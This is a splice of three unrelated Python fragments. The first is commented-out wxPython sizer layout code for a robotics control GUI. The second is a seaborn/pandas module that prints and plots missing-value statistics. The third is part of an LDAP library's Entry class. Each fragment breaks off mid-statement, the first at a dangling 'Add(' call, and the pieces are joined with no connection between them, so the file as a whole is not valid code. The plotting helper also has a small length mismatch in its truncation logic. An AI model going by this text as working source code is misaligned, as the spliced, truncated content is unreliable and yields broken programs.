# sizer_53_copy_copy.Add(self.button_mission_planning_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_53_copy_copy.Add(self.panel_mission_planning_qs, 1, wx.ALIGN_CENTER_VERTICAL, 0)
# sizer_53_copy_copy.Add(self.label_mission_planning_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_45.Add(sizer_53_copy_copy, 1, wx.EXPAND, 0)
# sizer_53_copy.Add(self.button_motion_planning_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_53_copy.Add(self.panel_motion_planning_qs, 1, wx.ALIGN_CENTER_VERTICAL, 0)
# sizer_53_copy.Add(self.label_motion_planning_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_45.Add(sizer_53_copy, 1, wx.EXPAND, 0)
# sizer_59.Add(self.button_android_tablet_qs, 1, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_59.Add(self.button_oculus_rift_qs, 1, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_59.Add(self.button_vehicle_gateway_qs, 1, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_59.Add(self.button_cloud_data_qs, 1, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_45.Add(sizer_59, 1, wx.EXPAND, 0)
# sizer_16.Add(sizer_45, 1, wx.ALL | wx.EXPAND, 4)
# sizer_60.Add(self.button_auto_pilot_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_51.Add(sizer_60, 1, wx.EXPAND, 0)
# sizer_52.Add(self.button_rosbag_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_52.Add(self.button_rviz_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_52.Add(self.button_rqt_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_51.Add(sizer_52, 0, wx.EXPAND, 0)
# sizer_16.Add(sizer_51, 0, wx.EXPAND, 0)
# self.tab_qs.SetSizer(sizer_16)
# sizer_46.Add(self.radio_box_localizer, 0, wx.ALL, 4)
# sizer_42.Add(self.button_setup_tf, 0, wx.ALL, 4)
# sizer_42.Add(self.panel_setup_tf, 1, wx.ALL, 4)
# sizer_46.Add(sizer_42, 0, wx.ALL | wx.EXPAND, 4)
# sizer_43.Add(self.button_vehicle_model, 0, wx.ALL, 4)
# sizer_43.Add(self.panel_vehicle_model, 1, wx.ALL, 4)
# sizer_46.Add(sizer_43, 0, wx.ALL | wx.EXPAND, 4)
# sizer_43_copy.Add(self.button_vehicle_info, 0, wx.ALL, 4)
# sizer_43_copy.Add(self.panel_vehicle_info, 1, wx.ALL, 4)
# sizer_46.Add(sizer_43_copy, 0, wx.ALL | wx.EXPAND, 10)
# sizer_40.Add(sizer_46, 1, wx.EXPAND, 0)
# sizer_62_copy_copy_copy_1.Add((20, 20), 1, 0, 0)
# sizer_52_copy_copy_copy_copy_1.Add(self.button_rosbag_setup, 0, wx.ALL, 4)
# sizer_52_copy_copy_copy_copy_1.Add(self.button_rviz_setup, 0, wx.ALL, 4)
# sizer_52_copy_copy_copy_copy_1.Add(self.button_rqt_setup, 0, wx.ALL, 4)
# sizer_62_copy_copy_copy_1.Add(sizer_52_copy_copy_copy_copy_1, 0, wx.EXPAND, 0)
# sizer_40.Add(sizer_62_copy_copy_copy_1, 0, wx.EXPAND, 0)
# self.tab_setup.SetSizer(sizer_40)
# sizer_53_copy_3.Add(self.button_point_cloud, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_53_copy_3.Add(self.panel_point_cloud, 1, wx.ALIGN_CENTER_VERTICAL, 0)
# sizer_63.Add(sizer_53_copy_3, 1, wx.EXPAND, 0)
# sizer_61.Add(sizer_63, 0, wx.TOP | wx.EXPAND, 4)
# sizer_64.Add(self.checkbox_auto_update, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_64.Add(self.choice_scene_num, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_53_copy_3_copy.Add(self.button_area_lists, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_53_copy_3_copy.Add(self.label_9, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_53_copy_3_copy.Add(self.panel_area_lists, 1, wx.ALIGN_CENTER_VERTICAL, 0)
# sizer_64.Add(sizer_53_copy_3_copy, 1, wx.BOTTOM | wx.EXPAND, 4)
# sizer_61.Add(sizer_64, 0, wx.BOTTOM | wx.EXPAND, 4)
# sizer_8.Add(self.label_point_cloud_bar, 1, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_8.Add(self.label_point_cloud, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_61.Add(sizer_8, 1, wx.ALL | wx.EXPAND, 4)
# sizer_61.Add(self.static_line_4, 0, wx.TOP | wx.BOTTOM | wx.EXPAND, 4)
# sizer_53_copy_4.Add(self.button_vector_map, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_53_copy_4.Add(self.panel_vector_map, 1, wx.ALIGN_CENTER_VERTICAL, 0)
# sizer_61.Add(sizer_53_copy_4, 0, wx.TOP | wx.BOTTOM | wx.EXPAND, 4)
# sizer_61.Add(self.static_line_5, 0, wx.TOP | wx.BOTTOM | wx.EXPAND, 4)
# sizer_53_copy_3_copy_1.Add(self.button_tf, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_53_copy_3_copy_1.Add(self.panel_tf, 1, wx.ALIGN_CENTER_VERTICAL, 0)
# sizer_61.Add(sizer_53_copy_3_copy_1, 0, wx.TOP | wx.BOTTOM | wx.EXPAND, 4)
# sizer_4.Add(sizer_61, 0, wx.ALL | wx.EXPAND, 4)
# sizer_53_copy_3_copy_2.Add(self.button_pcd_filter, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_53_copy_3_copy_2.Add(self.panel_pcd_filter, 1, wx.ALIGN_CENTER_VERTICAL, 0)
# sizer_39.Add(sizer_53_copy_3_copy_2, 0, wx.EXPAND, 0)
# sizer_39.Add(self.static_line_5_copy, 0, wx.TOP | wx.BOTTOM | wx.EXPAND, 4)
# sizer_53_copy_3_copy_2_copy.Add(self.button_pcd_binarizer, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_53_copy_3_copy_2_copy.Add(self.panel_pcd_binarizer, 1, wx.ALIGN_CENTER_VERTICAL, 0)
# sizer_39.Add(sizer_53_copy_3_copy_2_copy, 0, wx.EXPAND, 0)
# sizer_4.Add(sizer_39, 0, wx.LEFT | wx.RIGHT | wx.EXPAND, 4)
# sizer_62.Add((20, 20), 1, 0, 0)
# sizer_52_copy.Add(self.button_rosbag_map, 0, wx.ALL, 4)
# sizer_52_copy.Add(self.button_rviz_map, 0, wx.ALL, 4)
# sizer_52_copy.Add(self.button_rqt_map, 0, wx.ALL, 4)
# sizer_62.Add(sizer_52_copy, 0, wx.EXPAND, 0)
# sizer_4.Add(sizer_62, 0, wx.EXPAND, 0)
# self.tab_map.SetSizer(sizer_4)
# sizer_33.Add(self.panel_sensing, 1, wx.EXPAND, 0)
# sizer_5.Add(sizer_33, 1, wx.ALL | wx.EXPAND, 4)
# sizer_7.Add(self.tree_ctrl_sense, 2, wx.EXPAND, 0)
# sizer_69.Add(self.button_calibration_toolkit, 1, wx.ALL | wx.EXPAND | wx.ALIGN_CENTER_HORIZONTAL, 4)
# sizer_69.Add(self.button_calibration_publisher, 1, wx.ALL | wx.EXPAND | wx.ALIGN_CENTER_HORIZONTAL, 4)
# sizer_7.Add(sizer_69, 2, wx.TOP | wx.EXPAND, 8)
# sizer_70.Add(self.button_points_image, 1, wx.ALL | wx.EXPAND | wx.ALIGN_CENTER_HORIZONTAL, 4)
# sizer_70.Add(self.button_virtual_scan_image, 1, wx.ALL | wx.EXPAND | wx.ALIGN_CENTER_HORIZONTAL, 4)
# sizer_70.Add(self.button_scan_image, 1, wx.ALL | wx.EXPAND | wx.ALIGN_CENTER_HORIZONTAL, 4)
# sizer_7.Add(sizer_70, 3, wx.TOP | wx.BOTTOM | wx.EXPAND, 8)
# sizer_5.Add(sizer_7, 1, wx.ALL | wx.EXPAND, 4)
# sizer_68.Add(sizer_5, 1, wx.EXPAND, 0)
# sizer_62_copy.Add((20, 20), 1, 0, 0)
# sizer_52_copy_copy.Add(self.button_rosbag_sensing, 0, wx.ALL, 4)
# sizer_52_copy_copy.Add(self.button_rviz_sensing, 0, wx.ALL, 4)
# sizer_52_copy_copy.Add(self.button_rqt_sensing, 0, wx.ALL, 4)
# sizer_62_copy.Add(sizer_52_copy_copy, 0, wx.EXPAND, 0)
# sizer_68.Add(sizer_62_copy, 0, wx.EXPAND, 0)
# self.tab_sensing.SetSizer(sizer_68)
# sizer_27.Add(self.tree_ctrl_0, 1, wx.EXPAND, 0)
# sizer_27.Add(self.tree_ctrl_1, 1, wx.EXPAND, 0)
# sizer_71.Add(sizer_27, 1, wx.EXPAND, 0)
# sizer_47.Add(self.button_synchronization, 0, wx.ALL, 4)
# sizer_62_copy_copy.Add(sizer_47, 1, wx.EXPAND, 0)
# sizer_52_copy_copy_copy.Add(self.button_rosbag_computing, 0, wx.ALL, 4)
# sizer_52_copy_copy_copy.Add(self.button_rviz_computing, 0, wx.ALL, 4)
# sizer_52_copy_copy_copy.Add(self.button_rqt_computing, 0, wx.ALL, 4)
# sizer_62_copy_copy.Add(sizer_52_copy_copy_copy, 0, wx.EXPAND, 0)
# sizer_71.Add(sizer_62_copy_copy, 0, wx.EXPAND, 0)
# self.tab_computing.SetSizer(sizer_71)
# sizer_25.Add(self.button_android_tablet_interface, 1, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_25.Add(self.button_oculus_rift_interface, 1, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_25.Add(self.button_vehicle_gateway_interface, 1, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_9.Add(sizer_25, 3, wx.ALL | wx.EXPAND, 4)
# sizer_12.Add(self.checkbox_sound, 1, wx.ALL | wx.ALIGN_CENTER_HORIZONTAL, 4)
# sizer_9.Add(sizer_12, 1, wx.ALL | wx.EXPAND, 4)
# sizer_24.Add(sizer_9, 1, wx.EXPAND, 0)
# sizer_72.Add(self.button_auto_pilot_interface, 1, wx.ALL | wx.EXPAND, 4)
# sizer_75.Add((20, 20), 1, 0, 0)
# sizer_76.Add(self.label_5, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_54.Add(self.button_statchk_lamp_l, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_54.Add(self.button_statchk_lamp_r, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_76.Add(sizer_54, 1, wx.EXPAND, 0)
# sizer_75.Add(sizer_76, 1, 0, 0)
# sizer_76_copy.Add(self.label_5_copy, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_54_copy.Add(self.button_statchk_indi_l, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_54_copy.Add(self.button_statchk_indi_r, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_76_copy.Add(sizer_54_copy, 1, wx.EXPAND, 0)
# sizer_75.Add(sizer_76_copy, 1, 0, 0)
# sizer_75.Add((20, 20), 1, 0, 0)
# sizer_72.Add(sizer_75, 1, 0, 0)
# sizer_26.Add(sizer_72, 0, wx.EXPAND, 0)
# sizer_66.Add(self.button_statchk_d, 0, wx.ALL | wx.EXPAND, 4)
# sizer_66.Add(self.button_statchk_r, 0, wx.ALL | wx.EXPAND, 4)
# sizer_66.Add(self.button_statchk_b, 0, wx.ALL | wx.EXPAND, 4)
# sizer_66.Add(self.button_statchk_n, 0, wx.ALL | wx.EXPAND, 4)
# sizer_77.Add(sizer_66, 0, wx.ALL | wx.EXPAND, 4)
# sizer_77.Add(self.panel_interface_cc, 1, wx.ALL, 4)
# sizer_26.Add(sizer_77, 0, wx.EXPAND, 0)
# sizer_24.Add(sizer_26, 0, wx.ALL | wx.EXPAND, 4)
# sizer_24.Add((20, 20), 1, 0, 0)
# sizer_62_copy_copy_copy.Add((20, 20), 1, 0, 0)
# sizer_52_copy_copy_copy_copy.Add(self.button_rosbag_interface, 0, wx.ALL, 4)
# sizer_52_copy_copy_copy_copy.Add(self.button_rviz_interface, 0, wx.ALL, 4)
# sizer_52_copy_copy_copy_copy.Add(self.button_rqt_interface, 0, wx.ALL, 4)
# sizer_62_copy_copy_copy.Add(sizer_52_copy_copy_copy_copy, 0, wx.EXPAND, 0)
# sizer_24.Add(sizer_62_copy_copy_copy, 0, wx.EXPAND, 0)
# self.tab_interface.SetSizer(sizer_24)
# sizer_11.Add(self.tree_ctrl_data, 1, wx.ALL | wx.EXPAND, 4)
# sizer_18.Add(self.text_ctrl_query, | |
"""Plot statistis about missing values from given indicators."""
import matplotlib
import seaborn as sns
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import matplotlib.ticker as ticker
from mpl_toolkits.axes_grid1.parasite_axes import SubplotHost
# Plot functions: each indicator has a different way of being plotted
def plot_global(indicators, plot=False, show=True, ax=None):
"""Plot statistics on the full database."""
# Get required indicators
df = indicators['global']
n_rows = df.at[0, 'n_rows']
n_cols = df.at[0, 'n_cols']
n_values = df.at[0, 'n_values']
n_mv = df.at[0, 'n_mv']
n_mv1 = df.at[0, 'n_mv1']
n_mv2 = df.at[0, 'n_mv2']
n_not_mv = df.at[0, 'n_not_mv']
f_mv = df.at[0, 'f_mv']
f_mv1 = df.at[0, 'f_mv1']
f_mv2 = df.at[0, 'f_mv2']
f_not_mv = df.at[0, 'f_not_mv']
# Print these statistics
if show:
print(
f'\n'
f'Statistics on the full data frame:\n'
f'---------------------------------\n'
f'[{n_rows} rows x {n_cols} columns]\n'
f'{n_values} values\n'
f'N NMV: {f_not_mv:.1f}% or {n_not_mv}\n'
f'N MV: {f_mv:.1f}% or {n_mv}\n'
f' N MV 1: {f_mv1:.1f}% or {n_mv1}\n'
f' N MV 2: {f_mv2:.1f}% or {n_mv2}\n'
)
# If asked, plot these statistics
if plot:
if ax is None:
_, ax = plt.subplots(figsize=(10, 4))
df_show = pd.DataFrame({
'MV1': [n_mv1],
'MV2': [n_mv2],
'MV': [n_mv],
'V': [n_values],
'type': ['Full data frame']
})
sns.set_color_codes('pastel')
sns.barplot(x='V', y='type', data=df_show, color='lightgray', ax=ax,
label=f'Not missing ({f_not_mv:.1f}%)')
sns.set_color_codes('muted')
sns.barplot(x='MV', y='type', data=df_show, color='b', ax=ax,
label=f'Missing - Not applicable ({f_mv1:.1f}%)')
sns.set_color_codes('dark')
sns.barplot(x='MV2', y='type', data=df_show, color='b', ax=ax,
label=f'Missing - Not available ({f_mv2:.1f}%)')
box = ax.get_position()
ax.set_position([box.x0, box.y0, box.width * 0.5, box.height*0.5])
ax.legend(ncol=1, loc='center left', frameon=True,
title='Type of values',
bbox_to_anchor=(1.05, 0.5))
ax.set(ylabel='', xlabel=f'Number of values (Total {n_values})')
ax.set_title('Proportion of missing values')
sns.despine(left=True, bottom=True, ax=ax)
# Remove y labels
ax.tick_params(axis='y', which='both', left=False, labelleft=False)
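# Illustrative sketch (not part of the original module): plot_global expects
# indicators['global'] to be a one-row DataFrame holding the columns read
# above. The helper below builds such a frame from made-up numbers
# (4 rows x 3 columns, 3 missing values) so the function can be tried in
# isolation; every value here is hypothetical.
def _example_global_indicators():
    """Return a minimal 'indicators' dict accepted by plot_global."""
    df = pd.DataFrame({
        'n_rows': [4], 'n_cols': [3], 'n_values': [12],
        'n_mv': [3], 'n_mv1': [2], 'n_mv2': [1], 'n_not_mv': [9],
        'f_mv': [25.0], 'f_mv1': [100 * 2 / 12], 'f_mv2': [100 * 1 / 12],
        'f_not_mv': [75.0],
    })
    return {'global': df}
# Example call: plot_global(_example_global_indicators(), plot=True, show=True)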
def plot_features(indicators, plot=False, show=True, ax=None):
"""Plot the number of features with missing values."""
# Get required indicators
df = pd.concat([indicators['features'], indicators['global']], axis=1)
n_f_w_mv = df.at[0, 'n_f_w_mv']
n_f_w_mv1_o = df.at[0, 'n_f_w_mv1_o']
n_f_w_mv2_o = df.at[0, 'n_f_w_mv2_o']
n_f_w_mv_1a2 = df.at[0, 'n_f_w_mv_1a2']
n_f_wo_mv = df.at[0, 'n_f_wo_mv']
f_f_w_mv = df.at[0, 'f_f_w_mv']
f_f_w_mv1_o = df.at[0, 'f_f_w_mv1_o']
f_f_w_mv2_o = df.at[0, 'f_f_w_mv2_o']
f_f_w_mv_1a2 = df.at[0, 'f_f_w_mv_1a2']
f_f_wo_mv = df.at[0, 'f_f_wo_mv']
n_cols = df.at[0, 'n_cols']
if show:
print(
f'\n'
f'Statistics on features:\n'
f'-----------------------\n'
f'N features: {n_cols}\n'
f'N features with MV: {n_f_w_mv} ({f_f_w_mv:.1f}%)\n'
f' N features with MV1 only: {n_f_w_mv1_o} ({f_f_w_mv1_o:.1f}%)\n'
f' N features with MV2 only: {n_f_w_mv2_o} ({f_f_w_mv2_o:.1f}%)\n'
f' N features with MV1 and MV2: {n_f_w_mv_1a2} ({f_f_w_mv_1a2:.1f}%)\n'
)
if plot:
# Plot proportion of features with missing values
df_show = pd.DataFrame({
'N MV': [n_f_w_mv],
'N MV1 only': [n_f_w_mv1_o],
'N MV2 only': [n_f_w_mv2_o],
'N MV 1 xor 2': [n_f_w_mv1_o + n_f_w_mv2_o],
'N F': [n_cols],
'type': ['Full data frame']
})
if ax is None:
_, ax = plt.subplots(figsize=(10, 4))
sns.set_color_codes('pastel')
sns.barplot(x='N F', y='type', data=df_show, color='lightgray', ax=ax,
label=f'No missing values ({n_f_wo_mv} • {f_f_wo_mv:.1f}%)')
sns.set_color_codes('pastel')
sns.barplot(x='N MV', y='type', data=df_show, color='g', ax=ax,
label=f'Not applicable and not available ({n_f_w_mv_1a2} • {f_f_w_mv_1a2:.1f}%)')
sns.set_color_codes('muted')
sns.barplot(x='N MV 1 xor 2', y='type', data=df_show, color='g', ax=ax,
label=f'Not applicable only ({n_f_w_mv1_o} • {f_f_w_mv1_o:.1f}%)')
sns.set_color_codes('dark')
sns.barplot(x='N MV2 only', y='type', data=df_show, color='g', ax=ax,
label=f'Not available only ({n_f_w_mv2_o} • {f_f_w_mv2_o:.1f}%)')
box = ax.get_position()
ax.set_position([box.x0, box.y0, box.width * 0.5, box.height*0.5])
ax.legend(ncol=1, loc='center left', frameon=True,
title='Type of missing values contained in the feature',
bbox_to_anchor=(1.05, 0.5))
ax.set(ylabel='', xlabel=f'Number of features (Total {n_cols})')
ax.set_title('Proportion of features having missing values')
sns.despine(left=True, bottom=True, ax=ax)
# Remove y labels
ax.tick_params(axis='y', which='both', left=False, labelleft=False)
def plot_feature_wise(indicators, plot=False, show=True, ax=None, nf_max=40):
"""Plot the statistics feature-wise."""
n_mv_fw = indicators['feature-wise']
n_rows = indicators['global'].at[0, 'n_rows']
if show:
with pd.option_context('display.max_rows', None):
print(
f'\n'
f'Statistics feature-wise:\n'
f'------------------------\n'
f'\n'
f'{n_mv_fw}'
)
if plot:
# Plot proportion of missing values in each feature
# Copy index in a column for the barplot method
n_mv_fw['feature'] = n_mv_fw.index
n_mv_fw['feature_shortened'] = n_mv_fw['id'].astype(str) + ': ' + n_mv_fw.index
# Truncate
if n_mv_fw.shape[0] <= nf_max:
def truncate(string):
if len(string) <= 20:
return string
return string[:27]+'...'
n_mv_fw['feature_shortened'] = n_mv_fw['feature_shortened'].apply(truncate)
# Add the total number of values for each feature
n_mv_fw['N V'] = n_rows
# Get rid of the features with no missing values
n_mv_fw_l = n_mv_fw[(n_mv_fw['N MV1'] != 0) | (n_mv_fw['N MV2'] != 0)]
n_mv_fw_l = n_mv_fw_l.head(20)
if ax is None:
fig, ax = plt.subplots(figsize=(10, 8))
else:
fig = plt.gcf()
if n_mv_fw_l.empty:
return fig, ax
sns.set_color_codes('pastel')
sns.barplot(x='N V', y='feature_shortened', data=n_mv_fw_l, ax=ax,
color='lightgray', label=f'Not missing', dodge=False)
sns.set_color_codes('muted')
sns.barplot(x='N MV', y='feature_shortened', data=n_mv_fw_l, ax=ax,
color='b', label=f'Missing - Not applicable')
sns.set_color_codes("dark")
sns.barplot(x='N MV2', y='feature_shortened', data=n_mv_fw_l, ax=ax,
color="b", label=f'Missing - Not available')
ax.legend(ncol=1, loc='lower right', frameon=True,
title='Type of values')
ax.set(ylabel='Features', xlabel='Number of values')
ax.tick_params(labelsize=7)
sns.despine(left=True, bottom=True, ax=ax)
# Remove y labels if more than 40
if n_mv_fw_l.shape[0] > nf_max:
ax.tick_params(axis='y', which='both', left=False, labelleft=False)
fig.tight_layout(rect=(0, 0, 1, .92))
else:
fig.tight_layout(rect=(0., 0, 1, .92))
return fig, ax
def plot_feature_wise_v2(indicators, plot=False, show=True, ax=None, nf_max=40, color='b'):
"""Plot the statistics feature-wise."""
n_mv_fw = indicators['feature-wise']
if show:
with pd.option_context('display.max_rows', None):
print(
f'\n'
f'Statistics feature-wise:\n'
f'------------------------\n'
f'\n'
f'{n_mv_fw}'
)
if plot:
# Plot proportion of missing values in each feature
# Copy index in a column for the barplot method
n_mv_fw['feature'] = n_mv_fw.index
n_mv_fw['id'] = np.arange(n_mv_fw.shape[0])
        # Unlike plot_feature_wise, keep every feature here (no filtering on missing values)
        n_mv_fw_l = n_mv_fw
if ax is None:
fig, ax = plt.subplots(figsize=(10, 8))
else:
fig = plt.gcf()
sns.set_color_codes('pastel')
handle_nm, = ax.stackplot(n_mv_fw_l['id'].values, 100, color='lightgray', labels=['Not missing'])
handle_m, = ax.stackplot(n_mv_fw_l['id'].values, n_mv_fw_l['F MV'].values, color=color, labels=['Missing'])
# ax.stackplot(n_mv_fw_l['id'].values, n_mv_fw_l['N V'].values, color='lightgray', labels=['Not missing'])
# ax.stackplot(n_mv_fw_l['id'].values, n_mv_fw_l['N MV'].values, color='b', labels=['Missing'])
# ax.legend(ncol=1, loc='upper right', frameon=True,
# title='Type of values')
# ax.set(xlabel='Features', ylabel='Proportion')
# ax.set(xlabel='Features', ylabel='Number of values')
ax.tick_params(labelsize=7)
sns.despine(left=True, bottom=True, ax=ax)
        # Keep the same layout regardless of the number of features
if n_mv_fw.shape[0] > nf_max:
fig.tight_layout(rect=(0, 0, 1, .92))
else:
fig.tight_layout(rect=(0., 0, 1, .92))
return fig, ax, (handle_nm, handle_m)
def plot_rows(indicators, plot=False, show=True, ax=None):
"""Plot stats on rows without missing values."""
# Get required indicators
df = pd.concat([indicators['rows'], indicators['global']], axis=1)
n_r_wo_mv = df.at[0, 'n_r_wo_mv']
n_r_w_mv = df.at[0, 'n_r_w_mv']
n_r_w_mv1_o = df.at[0, 'n_r_w_mv1_o']
n_r_w_mv2_o = df.at[0, 'n_r_w_mv2_o']
n_r_w_mv_1a2 = df.at[0, 'n_r_w_mv_1a2']
f_r_wo_mv = df.at[0, 'f_r_wo_mv']
f_r_w_mv = df.at[0, 'f_r_w_mv']
f_r_w_mv1_o = df.at[0, 'f_r_w_mv1_o']
f_r_w_mv2_o = df.at[0, 'f_r_w_mv2_o']
f_r_w_mv_1a2 = df.at[0, 'f_r_w_mv_1a2']
n_rows = df.at[0, 'n_rows']
if show:
print(
f'\n'
f'Statistics on rows:\n'
f'-------------------\n'
f'N rows: {n_rows}\n'
f'N rows without MV: {n_r_wo_mv} ({f_r_wo_mv:.2f}%)\n'
f'N rows with MV: {n_r_w_mv} ({f_r_w_mv:.2f}%)\n'
f' N rows with MV1 only: {n_r_w_mv1_o} ({f_r_w_mv1_o:.2f}%)\n'
f' N rows with MV2 only: {n_r_w_mv2_o} ({f_r_w_mv2_o:.2f}%)\n'
f' N rows with MV1 and MV2: {n_r_w_mv_1a2} ({f_r_w_mv_1a2:.2f}%)\n'
)
if plot:
# Plot proportion of features with missing values
df_show = pd.DataFrame({
'N MV': [n_r_w_mv],
'N MV1 only': [n_r_w_mv1_o],
'N MV2 only': [n_r_w_mv2_o],
'N MV 1 xor 2': [n_r_w_mv1_o + n_r_w_mv2_o],
'N R': [n_rows],
'type': ['Full data frame']
})
if ax is None:
_, ax = plt.subplots(figsize=(10, 4))
sns.set_color_codes('pastel')
sns.barplot(x='N R', y='type', data=df_show, color='lightgray', ax=ax,
label=f'No missing values ({n_r_wo_mv} • {f_r_wo_mv:.2f}%)')
sns.set_color_codes('pastel')
sns.barplot(x='N MV', y='type', data=df_show, color='r', ax=ax,
label=f'Not applicable and not available ({n_r_w_mv_1a2} • {f_r_w_mv_1a2:.2f}%)')
sns.set_color_codes('muted')
sns.barplot(x='N MV 1 xor 2', y='type', data=df_show, color='r', ax=ax,
label=f'Not applicable only ({n_r_w_mv1_o} • {f_r_w_mv1_o:.2f}%)')
sns.set_color_codes('dark')
sns.barplot(x='N MV2 only', y='type', data=df_show, color='r', ax=ax,
label=f'Not available only ({n_r_w_mv2_o} • {f_r_w_mv2_o:.2f}%)')
box = ax.get_position()
ax.set_position([box.x0, box.y0, box.width*0.5, box.height*0.5])
ax.legend(ncol=1, loc='center left', frameon=True,
title='Type of missing values contained in the row',
bbox_to_anchor=(1.05, 0.5))
ax.set(ylabel='', xlabel=f'Number of rows (Total {n_rows})')
ax.set_title('Proportion of rows having missing values')
sns.despine(left=True, bottom=True, ax=ax)
# Remove y labels
ax.tick_params(axis='y', which='both', left=False, labelleft=False)
def plot_rm_rows(indicators, plot=False, show=True, ax=None):
"""Plot number of rows affected if we remove features with MV."""
# Get required indicators
df = pd.concat([indicators['rm_rows'], indicators['global']], axis=1)
n_r_a_rm_mv1 = df.at[0, 'n_r_a_rm_mv1']
n_r_a_rm_mv2 = df.at[0, 'n_r_a_rm_mv2']
n_r_a_rm_mv_1o2 = df.at[0, 'n_r_a_rm_mv_1o2']
n_r_a_rm_mv1_o = df.at[0, 'n_r_a_rm_mv1_o']
n_r_a_rm_mv2_o = df.at[0, 'n_r_a_rm_mv2_o']
n_r_a_rm_mv_1a2 = df.at[0, 'n_r_a_rm_mv_1a2']
f_r_a_rm_mv1 = df.at[0, 'f_r_a_rm_mv1']
f_r_a_rm_mv2 = df.at[0, 'f_r_a_rm_mv2']
f_r_a_rm_mv_1o2 = df.at[0, 'f_r_a_rm_mv_1o2']
f_r_a_rm_mv1_o = df.at[0, 'f_r_a_rm_mv1_o']
f_r_a_rm_mv2_o = df.at[0, 'f_r_a_rm_mv2_o']
f_r_a_rm_mv_1a2 = df.at[0, 'f_r_a_rm_mv_1a2']
n_rows = df.at[0, 'n_rows']
if show:
print(
            f'N rows losing information if we remove features with:\n'
f' MV1: {n_r_a_rm_mv1} ({f_r_a_rm_mv1:.2f}%)\n'
f' MV2: {n_r_a_rm_mv2} ({f_r_a_rm_mv2:.2f}%)\n'
f' MV: {n_r_a_rm_mv_1o2} ({f_r_a_rm_mv_1o2:.2f}%)\n'
f' MV1 only: {n_r_a_rm_mv1_o} ({f_r_a_rm_mv1_o:.2f}%)\n'
f' MV2 only: {n_r_a_rm_mv2_o} ({f_r_a_rm_mv2_o:.2f}%)\n'
f' MV1 and MV2: {n_r_a_rm_mv_1a2} ({f_r_a_rm_mv_1a2:.2f}%)\n'
)
if plot:
# Plot number of rows losing information when removing features with MV
df_show = pd.DataFrame({
'N rows affected': [
n_r_a_rm_mv1,
n_r_a_rm_mv2,
stream.write(prepare_for_stream(header + line_separator + line_separator))
stream.write(prepare_for_stream(ldif_output + line_separator + line_separator))
return ldif_output
class Entry(EntryBase):
"""The Entry object contains a single LDAP entry.
Attributes can be accessed either by sequence, by assignment
or as dictionary keys. Keys are not case sensitive.
The Entry object is read only
- The DN is retrieved by entry_dn
- The Reader reference is in _cursor()
- Raw attributes values are retrieved by the _ra_attributes and
_raw_attribute() methods
"""
def entry_writable(self, object_def=None, writer_cursor=None, attributes=None, custom_validator=None, auxiliary_class=None):
conf_operational_attribute_prefix = get_config_parameter('ABSTRACTION_OPERATIONAL_ATTRIBUTE_PREFIX')
if not self.entry_cursor.schema:
error_message = 'schema must be available to make an entry writable'
if log_enabled(ERROR):
log(ERROR, '%s for <%s>', error_message, self)
raise LDAPCursorError(error_message)
# returns a new WritableEntry and its Writer cursor
if object_def is None:
if self.entry_cursor.definition._object_class:
object_def = self.entry_definition._object_class
auxiliary_class = self.entry_definition._auxiliary_class + (auxiliary_class if isinstance(auxiliary_class, SEQUENCE_TYPES) else [])
elif 'objectclass' in self:
object_def = self.objectclass.values
if not object_def:
error_message = 'object class must be specified to make an entry writable'
if log_enabled(ERROR):
log(ERROR, '%s for <%s>', error_message, self)
raise LDAPCursorError(error_message)
if not isinstance(object_def, ObjectDef):
object_def = ObjectDef(object_def, self.entry_cursor.schema, custom_validator, auxiliary_class)
if attributes:
if isinstance(attributes, STRING_TYPES):
attributes = [attributes]
if isinstance(attributes, SEQUENCE_TYPES):
for attribute in attributes:
if attribute not in object_def._attributes:
error_message = 'attribute \'%s\' not in schema for \'%s\'' % (attribute, object_def)
if log_enabled(ERROR):
log(ERROR, '%s for <%s>', error_message, self)
raise LDAPCursorError(error_message)
else:
attributes = []
if not writer_cursor:
from .cursor import Writer # local import to avoid circular reference in import at startup
writable_cursor = Writer(self.entry_cursor.connection, object_def)
else:
writable_cursor = writer_cursor
if attributes: # force reading of attributes
writable_entry = writable_cursor._refresh_object(self.entry_dn, list(attributes) + self.entry_attributes)
else:
writable_entry = writable_cursor._create_entry(self._state.response)
